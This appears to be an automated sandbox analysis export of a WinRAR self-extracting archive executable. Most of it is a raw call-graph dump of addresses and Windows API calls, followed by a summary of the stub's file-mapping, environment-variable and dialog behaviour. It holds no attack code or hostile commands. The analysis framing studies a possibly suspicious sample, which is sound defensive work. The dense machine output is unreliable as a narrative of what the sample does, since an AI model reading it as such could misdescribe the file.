5 API calls 28494 a410e0 28493->28494 28494->28334 29799 a3eaa6 28495->29799 28498 a437bf GetWindow 28499 a43885 28498->28499 28500 a437d8 28498->28500 28501 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28499->28501 28500->28499 28503 a437e5 GetClassNameW 28500->28503 28505 a4386d GetWindow 28500->28505 28506 a43809 GetWindowLongW 28500->28506 28502 a41266 28501->28502 28502->28138 28502->28139 29804 a38da4 CompareStringW 28503->29804 28505->28499 28505->28500 28506->28505 28507 a43819 SendMessageW 28506->28507 28507->28505 28508 a4382f GetObjectW 28507->28508 29805 a3eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28508->29805 28510 a43846 29806 a3eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28510->29806 29807 a3ef21 13 API calls __ehhandler$___std_fs_get_file_id@8 28510->29807 28513 a43857 SendMessageW DeleteObject 28513->28505 29810 a457a5 28514->29810 28516 a31315 GetCurrentDirectoryW 28517 a31327 28516->28517 28520 a31323 28516->28520 29811 a21bbd 28 API calls 28517->29811 28519 a31339 GetCurrentDirectoryW 28521 a31356 _wcslen 28519->28521 28520->28153 28521->28520 28522 a212a7 26 API calls 28521->28522 28522->28520 28524 a21e11 SetWindowTextW 28523->28524 28525 a21e0f 28523->28525 28524->28164 28525->28524 28527 a3f2f9 28526->28527 28528 a3f31e 28526->28528 29812 a38da4 CompareStringW 28527->29812 28531 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28528->28531 28530 a3f30c 28530->28528 28532 a3f310 FindWindowExW 28530->28532 28533 a3f337 28531->28533 28532->28528 28534 a3fdd1 28533->28534 28535 a3fded 28534->28535 28536 a220b0 30 API calls 28535->28536 28537 a3fe27 28536->28537 29813 a22dbb 28537->29813 28540 a3fe43 28542 a2232c 123 API calls 28540->28542 28541 a3fe4c 29820 a2278b 28541->29820 28545 a3fe48 28542->28545 28547 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28545->28547 28546 a2232c 123 API calls 28546->28545 28548 a3fe77 28547->28548 28548->28195 28548->28198 28549->28160 28551 a21df3 SetDlgItemTextW 
28550->28551 28552 a21df1 28550->28552 28551->28165 28552->28551 28553->28178 28555 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28554->28555 28556 a457a0 28555->28556 28556->28556 28558 a214bd _wcslen 28557->28558 28559 a2120c 28 API calls 28558->28559 28560 a214ca 28559->28560 28561 a43572 28560->28561 29904 a40678 PeekMessageW 28561->29904 28564 a435e4 SendMessageW SendMessageW 28566 a43624 28564->28566 28567 a43643 SendMessageW 28564->28567 28565 a435ac 28570 a435b7 ShowWindow SendMessageW SendMessageW 28565->28570 28566->28567 28568 a4365d SendMessageW SendMessageW 28567->28568 28569 a4365b 28567->28569 28571 a436a2 SendMessageW 28568->28571 28572 a4367f SendMessageW 28568->28572 28569->28568 28570->28564 28573 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28571->28573 28572->28571 28574 a436c0 28573->28574 28574->28194 28576 a2768c 28575->28576 29909 a27430 28576->29909 28578 a27699 28579 a434eb 28 API calls __EH_prolog3_GS 28578->28579 28579->28190 29920 a368d4 28580->29920 28583->28212 28585 a2ed1f 49 API calls 28584->28585 28586 a2ed16 28585->28586 28586->28219 28586->28251 28587->28219 28589 a31405 __EH_prolog3 28588->28589 28590 a456f6 28 API calls 28589->28590 28591 a3140f 28590->28591 28592 a31431 GetModuleFileNameW 28591->28592 28593 a31463 28591->28593 28594 a21be3 28 API calls 28591->28594 28592->28591 28592->28593 28595 a214a7 28 API calls 28593->28595 28594->28591 28596 a3146c 28595->28596 28597 a3147f 28596->28597 28598 a212a7 26 API calls 28596->28598 28597->28286 28598->28597 28599->28298 28600->28333 28601->28339 28602->28345 28603->28349 28604->28353 28606 a22e93 28605->28606 28607 a22ea0 28605->28607 28608 a212a7 26 API calls 28606->28608 28607->28367 28608->28607 28609->28291 28610->28155 28611->28258 28612->28226 28613->28253 28614->28242 28615->28228 28616->28377 28617->28375 28618->28383 28633 a457d8 28619->28633 28621 a21d70 GetWindowTextLengthW 28634 a21bbd 28 API calls 28621->28634 28623 a21dab GetWindowTextW 28624 
a214a7 28 API calls 28623->28624 28625 a21dca 28624->28625 28626 a21ddd 28625->28626 28635 a212a7 28625->28635 28628 a45787 5 API calls 28626->28628 28629 a21de4 28628->28629 28629->28388 28640 a45734 28630->28640 28632 a21d61 28632->28155 28632->28156 28632->28284 28633->28621 28634->28623 28636 a212b4 28635->28636 28638 a212c1 28635->28638 28639 a219a9 26 API calls 28636->28639 28638->28626 28639->28638 28641 a4573c 28640->28641 28642 a4573d IsProcessorFeaturePresent 28640->28642 28641->28632 28644 a45bfc 28642->28644 28647 a45bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28644->28647 28646 a45cdf 28646->28632 28647->28646 28649 a276e1 28648->28649 28650 a276bb 28648->28650 28683 a258cb 45 API calls 28649->28683 28674 a2120c 28650->28674 28654 a276db 28654->28406 28658 a2effb __EH_prolog3_GS 28655->28658 28656 a2f02f 28659 a2ed0d 49 API calls 28656->28659 28657 a2f01b CreateDirectoryW 28657->28656 28660 a2f0d0 28657->28660 28658->28656 28658->28657 28661 a2f03b 28659->28661 28662 a2f0df 28660->28662 28727 a2f58b 28660->28727 28663 a2f0e3 GetLastError 28661->28663 28740 a3169a 28661->28740 28667 a45787 5 API calls 28662->28667 28663->28662 28669 a2f100 28667->28669 28668 a2f07d 28673 a2f0ad 28668->28673 28797 a219a9 26 API calls 28668->28797 28669->28406 28670 a2f073 CreateDirectoryW 28670->28668 28671 a2f070 28671->28670 28673->28660 28673->28663 28675 a2127d 28674->28675 28678 a2121d 28674->28678 28691 a21a92 28 API calls std::_Xinvalid_argument 28675->28691 28682 a21228 28678->28682 28684 a212d3 28 API calls Concurrency::cancel_current_task 28678->28684 28680 a21254 28685 a211b8 28680->28685 28682->28654 28684->28680 28686 a211c3 28685->28686 28687 a211cb 28685->28687 28706 a211dd 28686->28706 28689 a211c9 28687->28689 28692 a456f6 28687->28692 28689->28682 28695 a456fb 28692->28695 28694 a45715 28694->28689 28695->28694 28697 a45717 28695->28697 28715 a4d08c 28695->28715 28722 a4e91a 7 API calls 2 library calls 
28695->28722 28698 a21a25 Concurrency::cancel_current_task 28697->28698 28700 a45721 28697->28700 28699 a4734a _com_raise_error RaiseException 28698->28699 28701 a21a41 28699->28701 28702 a4734a _com_raise_error RaiseException 28700->28702 28704 a21a5a 28701->28704 28705 a212a7 26 API calls 28701->28705 28703 a46628 28702->28703 28704->28689 28705->28704 28707 a21206 28706->28707 28708 a211e8 28706->28708 28726 a21a25 27 API calls 2 library calls 28707->28726 28710 a456f6 28 API calls 28708->28710 28712 a211ee 28710->28712 28711 a2120b 28713 a211f5 28712->28713 28725 a4ac9e 26 API calls __cftof 28712->28725 28713->28689 28719 a5040e __dosmaperr 28715->28719 28716 a5044c 28724 a501d3 20 API calls __dosmaperr 28716->28724 28718 a50437 RtlAllocateHeap 28718->28719 28720 a5044a 28718->28720 28719->28716 28719->28718 28723 a4e91a 7 API calls 2 library calls 28719->28723 28720->28695 28722->28695 28723->28719 28724->28720 28726->28711 28728 a2f597 __EH_prolog3_GS 28727->28728 28729 a2f5a4 SetFileAttributesW 28728->28729 28730 a2f5b7 28729->28730 28738 a2f622 28729->28738 28732 a3169a 47 API calls 28730->28732 28731 a45787 5 API calls 28733 a2f638 28731->28733 28734 a2f5d7 28732->28734 28733->28662 28735 a2f5f6 28734->28735 28736 a2f5e7 SetFileAttributesW 28734->28736 28737 a2f5e4 28734->28737 28735->28738 28798 a219a9 26 API calls 28735->28798 28736->28735 28737->28736 28738->28731 28741 a316e7 28740->28741 28758 a316e0 28740->28758 28742 a214a7 28 API calls 28741->28742 28745 a316f4 28742->28745 28743 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28744 a2f063 28743->28744 28744->28668 28744->28670 28744->28671 28746 a31711 28745->28746 28747 a317db 28745->28747 28750 a31741 28746->28750 28751 a3171b 28746->28751 28748 a31309 30 API calls 28747->28748 28749 a317fb 28748->28749 28753 a318ed 28749->28753 28760 a31875 28749->28760 28761 a3181f 28749->28761 28764 a2769f 45 API calls 28750->28764 28765 a31739 28750->28765 28799 a30ba6 28 API calls 28751->28799 
28753->28765 28810 a219a9 26 API calls 28753->28810 28754 a31729 28800 a225a4 28754->28800 28755 a21a66 26 API calls 28755->28758 28758->28743 28759 a31731 28762 a21a66 26 API calls 28759->28762 28808 a30ba6 28 API calls 28760->28808 28806 a30c41 28 API calls 28761->28806 28762->28765 28768 a31789 28764->28768 28765->28755 28766 a31883 28769 a225a4 26 API calls 28766->28769 28804 a30bf3 28 API calls _wcslen 28768->28804 28772 a3188c 28769->28772 28770 a31838 28807 a21188 28 API calls 28770->28807 28775 a21a66 26 API calls 28772->28775 28774 a3179e 28805 a2aef3 28 API calls 28774->28805 28778 a31894 28775->28778 28776 a31848 28781 a225a4 26 API calls 28776->28781 28809 a30ddb 28 API calls 28778->28809 28779 a317b2 28782 a225a4 26 API calls 28779->28782 28783 a31860 28781->28783 28784 a317be 28782->28784 28785 a21a66 26 API calls 28783->28785 28786 a21a66 26 API calls 28784->28786 28788 a31868 28785->28788 28790 a317c6 28786->28790 28787 a3189c 28789 a2769f 45 API calls 28787->28789 28791 a21a66 26 API calls 28788->28791 28793 a31870 28789->28793 28792 a21a66 26 API calls 28790->28792 28791->28793 28794 a317ce 28792->28794 28796 a21a66 26 API calls 28793->28796 28795 a21a66 26 API calls 28794->28795 28795->28765 28796->28753 28797->28673 28798->28738 28799->28754 28801 a225b2 28800->28801 28802 a225ad 28800->28802 28801->28759 28803 a21a66 26 API calls 28802->28803 28803->28801 28804->28774 28805->28779 28806->28770 28807->28776 28808->28766 28809->28787 28810->28765 28812 a22f2f 28811->28812 28813 a22f26 28811->28813 28814 a2120c 28 API calls 28812->28814 28813->28416 28814->28813 28816 a25975 28815->28816 28817 a25a3a 28815->28817 28821 a25987 28816->28821 28822 a23029 28 API calls 28816->28822 28823 a258cb 45 API calls 28817->28823 28821->28421 28822->28821 28824->28426 28826 a2e015 28825->28826 28827 a2dfeb 28825->28827 28826->28443 28827->28826 28836 a2ec63 28827->28836 28831 a2de5c 28830->28831 28833 a2de76 28830->28833 28831->28833 28834 a2de68 CloseHandle 
28831->28834 28832 a2de95 28832->28443 28833->28832 28850 a2925b 109 API calls 28833->28850 28834->28833 28837 a2ec6f __EH_prolog3_GS 28836->28837 28838 a2ec7c DeleteFileW 28837->28838 28839 a2ec8c 28838->28839 28848 a2ecf4 28838->28848 28841 a3169a 47 API calls 28839->28841 28840 a45787 5 API calls 28842 a2e013 28840->28842 28843 a2ecac 28841->28843 28842->28443 28844 a2ecc8 28843->28844 28845 a2ecb9 28843->28845 28846 a2ecbc DeleteFileW 28843->28846 28844->28848 28849 a219a9 26 API calls 28844->28849 28845->28846 28846->28844 28848->28840 28849->28848 28850->28832 28857 a3347b 28851->28857 28854 a34346 SetDlgItemTextW 28854->28450 28855 a3436c LoadStringW 28855->28854 28856 a34383 LoadStringW 28855->28856 28856->28854 28864 a3338e 28857->28864 28860 a334bc 28862 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28860->28862 28863 a334d1 28862->28863 28863->28854 28863->28855 28865 a333c2 28864->28865 28873 a33445 _strncpy 28864->28873 28869 a333e2 28865->28869 28875 a389ed WideCharToMultiByte 28865->28875 28867 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28868 a33474 28867->28868 28868->28860 28874 a334d5 26 API calls 28868->28874 28872 a33413 28869->28872 28876 a342b2 50 API calls __vsnprintf 28869->28876 28877 a4d097 26 API calls 3 library calls 28872->28877 28873->28867 28874->28860 28875->28869 28876->28872 28877->28873 28878->28467 28879->28467 28880->28467 28881->28467 28882->28467 28885 a36a99 _wcslen 28884->28885 28939 a21be3 28885->28939 28887 a36abb 28887->28484 28889 a36a74 28888->28889 28890 a36a89 28 API calls 28889->28890 28891 a36a86 28890->28891 28892 a2b03d 28891->28892 28893 a2b049 __EH_prolog3_GS 28892->28893 28944 a32815 28893->28944 28895 a2b092 28954 a2b231 28895->28954 28898 a21a66 26 API calls 28899 a2b120 28898->28899 28900 a21a66 26 API calls 28899->28900 28901 a2b128 28900->28901 28902 a456f6 28 API calls 28901->28902 28903 a2b13f 28902->28903 28959 a3a599 28903->28959 28905 a2b172 28906 a45787 5 API calls 28905->28906 
28907 a2b179 28906->28907 28908 a2b3e1 28907->28908 28909 a2b3ed __EH_prolog3_GS 28908->28909 28910 a2b478 28909->28910 28913 a2b484 28909->28913 29018 a2f711 28909->29018 28911 a21a66 26 API calls 28910->28911 28911->28913 28918 a2b4e0 28913->28918 28985 a2bc65 28913->28985 28914 a2b529 28915 a45787 5 API calls 28914->28915 28917 a2b543 28915->28917 28920 a2b194 28917->28920 28918->28914 29025 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 28918->29025 29743 a2d6bc 28920->29743 28923 a21a66 26 API calls 28926 a2b1e8 28923->28926 28925 a2b1d0 28925->28923 28927 a21a66 26 API calls 28926->28927 28928 a2b1f3 28927->28928 28929 a21a66 26 API calls 28928->28929 28930 a2b1fe 28929->28930 29757 a328aa 28930->29757 28932 a2b206 28933 a21a66 26 API calls 28932->28933 28934 a2b20e 28933->28934 28935 a21a66 26 API calls 28934->28935 28936 a2b216 28935->28936 28937 a2d869 26 API calls 28936->28937 28938 a2b21d 28937->28938 28938->28493 28940 a21c03 28939->28940 28942 a21bfb 28939->28942 28940->28942 28943 a21c33 28 API calls 28940->28943 28942->28887 28943->28942 28945 a32821 __EH_prolog3 28944->28945 28946 a456f6 28 API calls 28945->28946 28947 a3285f 28946->28947 28948 a32872 28947->28948 28965 a280ec 28947->28965 28950 a456f6 28 API calls 28948->28950 28951 a32883 28950->28951 28952 a280ec 28 API calls 28951->28952 28953 a32896 28951->28953 28952->28953 28953->28895 28955 a225a4 26 API calls 28954->28955 28956 a2b23f 28955->28956 28957 a225a4 26 API calls 28956->28957 28958 a2b118 28957->28958 28958->28898 28960 a3a5a5 __EH_prolog3 28959->28960 28961 a456f6 28 API calls 28960->28961 28962 a3a5bf 28961->28962 28963 a3a5d6 28962->28963 28984 a37445 112 API calls 28962->28984 28963->28905 28966 a280f8 __EH_prolog3 28965->28966 28971 a45b4b 28966->28971 28968 a28111 28969 a45b4b 28 API calls 28968->28969 28970 a28133 __cftof 28969->28970 28970->28948 28972 a45b57 ___scrt_is_nonwritable_in_current_image 28971->28972 28973 a45b82 28972->28973 28975 a28180 28972->28975 
28973->28968 28976 a2818c __EH_prolog3 28975->28976 28979 a34f2b 28976->28979 28978 a28196 28978->28972 28980 a34f37 __EH_prolog3 28979->28980 28983 a21ece 28 API calls 28980->28983 28982 a34f50 28982->28978 28983->28982 28984->28963 28986 a2bc80 28985->28986 29026 a220b0 28986->29026 28988 a2bca7 28989 a2bcba 28988->28989 29250 a2e910 28988->29250 28993 a2bcec 28989->28993 29038 a227e0 28989->29038 28992 a2bce8 28992->28993 29062 a22d41 160 API calls __EH_prolog3_GS 28992->29062 29227 a2232c 28993->29227 28999 a2bd14 29000 a2be08 28999->29000 29001 a27673 28 API calls 28999->29001 29063 a2bec2 7 API calls 29000->29063 29003 a2bd36 29001->29003 29254 a31e54 46 API calls 2 library calls 29003->29254 29005 a2bd53 29007 a2f711 53 API calls 29005->29007 29009 a2bde8 29005->29009 29013 a21a66 26 API calls 29005->29013 29255 a31e54 46 API calls 2 library calls 29005->29255 29006 a2be16 29008 a2be76 29006->29008 29064 a3864f 29006->29064 29007->29005 29008->28993 29067 a252d8 29008->29067 29079 a2bf3d 29008->29079 29012 a21a66 26 API calls 29009->29012 29014 a2bded 29012->29014 29013->29005 29017 a21a66 26 API calls 29014->29017 29017->29000 29019 a31a9f 5 API calls 29018->29019 29020 a2f723 29019->29020 29021 a2f74b 29020->29021 29701 a2f826 29020->29701 29021->28909 29024 a2f738 FindClose 29024->29021 29025->28914 29027 a220bc __EH_prolog3 29026->29027 29028 a280ec 28 API calls 29027->29028 29029 a220d9 29028->29029 29030 a32815 28 API calls 29029->29030 29031 a220e8 29030->29031 29032 a22193 29031->29032 29033 a456f6 28 API calls 29031->29033 29264 a3026f 29032->29264 29034 a22180 29033->29034 29034->29032 29256 a276e7 29034->29256 29037 a22227 __cftof 29037->28988 29039 a227ec __EH_prolog3 29038->29039 29040 a211dd 28 API calls 29039->29040 29044 a22838 29039->29044 29059 a2298b 29039->29059 29045 a22882 29040->29045 29041 a229a9 29288 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29041->29288 29043 a252d8 133 API calls 29049 a229f4 29043->29049 29044->29041 
29046 a229b6 29044->29046 29060 a2e850 111 API calls 29045->29060 29046->29043 29046->29059 29047 a22a3c 29051 a22a6f 29047->29051 29047->29059 29289 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29047->29289 29049->29047 29050 a252d8 133 API calls 29049->29050 29050->29049 29051->29059 29061 a2e850 111 API calls 29051->29061 29052 a22986 29055 a22e8b 26 API calls 29052->29055 29053 a22995 29054 a22e8b 26 API calls 29053->29054 29054->29044 29055->29059 29056 a228ad 29056->29052 29056->29053 29057 a252d8 133 API calls 29058 a22ac0 29057->29058 29058->29057 29058->29059 29059->28992 29060->29056 29061->29058 29062->28999 29063->29006 29290 a44300 29064->29290 29068 a252e4 29067->29068 29069 a252e8 29067->29069 29068->29008 29078 a2e850 111 API calls 29069->29078 29070 a252fa 29071 a25323 29070->29071 29072 a25315 29070->29072 29321 a23d9d 131 API calls 3 library calls 29071->29321 29073 a25355 29072->29073 29320 a248aa 118 API calls 2 library calls 29072->29320 29073->29008 29076 a25321 29076->29073 29322 a2344b 89 API calls 29076->29322 29078->29070 29080 a2bf95 29079->29080 29085 a2bfc4 29080->29085 29145 a2c2fd 29080->29145 29422 a3cdb4 135 API calls __EH_prolog3_GS 29080->29422 29082 a2d2e5 29083 a2d331 29082->29083 29084 a2d2ea 29082->29084 29083->29145 29494 a3cdb4 135 API calls __EH_prolog3_GS 29083->29494 29084->29145 29493 a2ab88 185 API calls 29084->29493 29085->29082 29090 a2bfeb 29085->29090 29085->29145 29086 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29087 a2d327 29086->29087 29087->29008 29090->29145 29323 a27e1b 29090->29323 29092 a2c0c8 29335 a3106b 29092->29335 29096 a2c151 29100 a2c16f 29096->29100 29424 a32095 45 API calls __EH_prolog3_GS 29096->29424 29098 a2c269 29104 a2c29b 29098->29104 29425 a219a9 26 API calls 29098->29425 29099 a2d205 29103 a2c948 29099->29103 29140 a2c743 29099->29140 29127 a2c239 29100->29127 29427 a30ddb 28 API calls 29100->29427 29102 a2c374 29102->29099 29105 a2c3ea 29102->29105 29106 a2c3cf 
29102->29106 29118 a2c97a 29103->29118 29460 a219a9 26 API calls 29103->29460 29104->29145 29426 a219a9 26 API calls 29104->29426 29121 a2c409 29105->29121 29429 a2b92d 56 API calls __ehhandler$___std_fs_get_file_id@8 29105->29429 29108 a21a66 26 API calls 29106->29108 29111 a2c3da 29108->29111 29117 a21a66 26 API calls 29111->29117 29113 a2d276 29113->29145 29492 a219a9 26 API calls 29113->29492 29117->29145 29118->29145 29461 a219a9 26 API calls 29118->29461 29119 a2c33d _wcslen 29428 a2f103 52 API calls 2 library calls 29119->29428 29120 a2c4ea 29345 a2b2ee 29120->29345 29121->29120 29123 a2f711 53 API calls 29121->29123 29133 a2c49b 29123->29133 29126 a2c5c2 29128 a2c7d8 29126->29128 29132 a2c5cf 29126->29132 29127->29098 29127->29102 29438 a32a36 115 API calls 29128->29438 29129 a21a66 26 API calls 29129->29120 29166 a2c62c 29132->29166 29432 a257c0 28 API calls 2 library calls 29132->29432 29133->29129 29136 a2c501 29142 a2c551 29136->29142 29430 a219a9 26 API calls 29136->29430 29138 a2c8f0 29146 a2c9eb 29138->29146 29162 a2c8ff 29138->29162 29139 a2c830 29139->29138 29147 a2c859 29139->29147 29140->29113 29491 a219a9 26 API calls 29140->29491 29142->29145 29431 a219a9 26 API calls 29142->29431 29145->29086 29158 a2c874 29146->29158 29351 a2b345 29146->29351 29151 a2ed0d 49 API calls 29147->29151 29153 a2ca64 29147->29153 29147->29158 29148 a2c940 29150 a2ddc7 114 API calls 29148->29150 29150->29103 29155 a2c8b3 29151->29155 29152 a2ca01 29156 a2ca05 29152->29156 29357 a2b778 29152->29357 29178 a2cac5 29153->29178 29218 a2d1f2 29153->29218 29462 a2e152 29153->29462 29154 a2ddc7 114 API calls 29154->29099 29155->29158 29440 a2d8b8 29155->29440 29159 a2ddc7 114 API calls 29156->29159 29158->29153 29158->29156 29169 a2b345 90 API calls 29158->29169 29159->29140 29162->29148 29459 a2b544 144 API calls __EH_prolog3_GS 29162->29459 29165 a2cb15 29171 a2fd70 28 API calls 29165->29171 29166->29140 29167 a2c77a 29166->29167 29174 a2c781 29166->29174 29433 a2b015 28 
[Execution graph export. The original page rendered this section as an interactive call graph; in the text export only its node identifiers (29166 to 30474), function addresses (a21a66 through a58fc0), per-node "N API calls" / "N library calls" counts and edge lists survive, and those are not reproduced here. The Windows API calls referenced by the graph nodes in this excerpt are listed below, grouped by area; they are the annotations the graph attaches to functions, not a sequence of observed calls.]

File I/O: CreateFileW, ReadFile, WriteFile, SetFilePointer, SetEndOfFile, SetFileTime, FlushFileBuffers, GetFileAttributesW, GetFileType, FindFirstFileW, FindNextFileW, GetStdHandle, CloseHandle.
Memory and mapping: OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, RtlAllocateHeap, RtlFreeHeap.
Process, module and environment: GetCurrentProcess, GetCurrentProcessId, GetProcessAffinityMask, TerminateProcess, ExitProcess, GetModuleHandleW, GetModuleHandleExW, LoadLibraryW, FreeLibrary, GetProcAddress, GetPEB, GetCommandLineW, GetStartupInfoW, GetVersionExW, GetSystemDirectoryW, SetEnvironmentVariableW, GetLocalTime, ShellExecuteExW.
Threads and synchronisation: CreateThread, SetThreadPriority, SetThreadExecutionState, WaitForSingleObject, ResetEvent, ReleaseSemaphore, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, Sleep.
Console: AllocConsole, AttachConsole, WriteConsoleW, FreeConsole.
UI, GDI and COM: DialogBoxParamW, GetDlgItem, SendDlgItemMessageW, PeekMessageW, GetMessageW, IsDialogMessageW, TranslateMessage, DispatchMessageW, LoadIconW, GetDC, GetDeviceCaps, ReleaseDC, DeleteObject, GdiplusStartup, GdiplusShutdown, OleInitialize, CoUninitialize, SHGetMalloc.
Errors and exceptions: GetLastError, RaiseException (_com_raise_error), IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter; string comparison via CompareStringW. CRT and C++ runtime helpers also present as node labels: __EH_prolog3 / __EH_prolog3_GS, __ehhandler$___std_fs_get_file_id@8, __InternalCxxFrameHandler, ___std_exception_copy, __dosmaperr, _abort, _wcslen, _swprintf, __vsnwprintf_l, __cftof, std::_Xinvalid_argument, Concurrency::cancel_current_task, ___delayLoadHelper2@8, ___scrt_is_nonwritable_in_current_image, ___scrt_release_startup_lock.
WaitForInputIdle 30448->30452 30453 a43ace IsWindowVisible 30448->30453 30458 a43b30 CloseHandle 30448->30458 30449->30461 30484 a219a9 26 API calls 30449->30484 30482 a30e49 51 API calls 2 library calls 30450->30482 30475 a43fcf WaitForSingleObject 30452->30475 30453->30452 30454 a43ad9 ShowWindow 30453->30454 30454->30452 30456 a43a82 30460 a21a66 26 API calls 30456->30460 30462 a43b48 30458->30462 30463 a43b3d 30458->30463 30459 a43afb 30459->30458 30466 a43b08 GetExitCodeProcess 30459->30466 30464 a43a8e 30460->30464 30461->30433 30462->30449 30467 a43b73 ShowWindow 30462->30467 30483 a38da4 CompareStringW 30463->30483 30464->30446 30466->30458 30468 a43b19 30466->30468 30467->30449 30468->30458 30470->30420 30471->30420 30472->30426 30473->30423 30476 a43fea 30475->30476 30480 a4402f 30475->30480 30477 a43fed PeekMessageW 30476->30477 30478 a44020 WaitForSingleObject 30477->30478 30479 a43fff GetMessageW TranslateMessage DispatchMessageW 30477->30479 30478->30477 30478->30480 30479->30478 30480->30459 30481->30438 30482->30456 30483->30462 30484->30461 30485 a2e3d5 30491 a2e3df 30485->30491 30486 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 30487 a2e481 30486->30487 30488 a2e551 SetFilePointer 30489 a2e56e GetLastError 30488->30489 30490 a2e403 30488->30490 30489->30490 30490->30486 30491->30488 30491->30490 30492 a21125 30493 a276e7 30 API calls 30492->30493 30494 a2112a 30493->30494 30497 a46029 29 API calls 30494->30497 30496 a21134 30497->30496 30498 a4437d 30499 a44389 __EH_prolog3_GS 30498->30499 30500 a34318 53 API calls 30499->30500 30501 a443c6 30500->30501 30502 a36a25 53 API calls 30501->30502 30503 a443d0 30502->30503 30504 a225a4 26 API calls 30503->30504 30505 a443dc 30504->30505 30506 a21a66 26 API calls 30505->30506 30507 a443e4 30506->30507 30508 a21de7 SetDlgItemTextW 30507->30508 30509 a443f5 30508->30509 30510 a40678 5 API calls 30509->30510 30511 a443fa 30510->30511 30512 a44430 30511->30512 30516 a219a9 26 API calls 30511->30516 
30513 a45787 5 API calls 30512->30513 30514 a44446 30513->30514 30516->30512 30520 a44b8a 30521 a44b33 30520->30521 30522 a44fce ___delayLoadHelper2@8 17 API calls 30521->30522 30522->30521

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A36D7B: GetModuleHandleW.KERNEL32(kernel32,5C02E116), ref: 00A36DC7
                                                                                                                                                        • Part of subcall function 00A36D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A36DD9
                                                                                                                                                        • Part of subcall function 00A36D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A36E03
                                                                                                                                                        • Part of subcall function 00A31309: __EH_prolog3.LIBCMT ref: 00A31310
                                                                                                                                                        • Part of subcall function 00A31309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00A317FB,?,?,\\?\,5C02E116,?,?,?,00000000,00A5A279,000000FF), ref: 00A31319
                                                                                                                                                        • Part of subcall function 00A3F4D4: OleInitialize.OLE32(00000000), ref: 00A3F4ED
                                                                                                                                                        • Part of subcall function 00A3F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A3F524
                                                                                                                                                        • Part of subcall function 00A3F4D4: SHGetMalloc.SHELL32(00A7532C), ref: 00A3F52E
                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00A44608
                                                                                                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 00A4464F
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00A44661
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00A4466F
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 00A4467D
                                                                                                                                                        • Part of subcall function 00A3FC38: __EH_prolog3.LIBCMT ref: 00A3FC3F
                                                                                                                                                        • Part of subcall function 00A43EFC: __EH_prolog3_GS.LIBCMT ref: 00A43F03
                                                                                                                                                        • Part of subcall function 00A43EFC: SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00A43F1B
                                                                                                                                                        • Part of subcall function 00A43EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00A43F86
                                                                                                                                                        • Part of subcall function 00A351BF: _wcslen.LIBCMT ref: 00A351E3
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,00A75430,00000400,00A75430,00A75430,00000400,00000000,00000001,?,00000000), ref: 00A446CC
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A446D3
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00A69698,00000000), ref: 00A4472F
                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00A4473A
                                                                                                                                                      • _swprintf.LIBCMT ref: 00A44779
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A4478E
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00A44795
                                                                                                                                                      • LoadIconW.USER32(00000000,00000064), ref: 00A447AC
                                                                                                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00A44803
                                                                                                                                                      • Sleep.KERNELBASE(00001B58), ref: 00A44834
                                                                                                                                                      • DeleteObject.GDI32 ref: 00A44858
                                                                                                                                                      • DeleteObject.GDI32(16050E2A), ref: 00A44868
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                        • Part of subcall function 00A419EE: __EH_prolog3_GS.LIBCMT ref: 00A419F5
                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00A448AA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
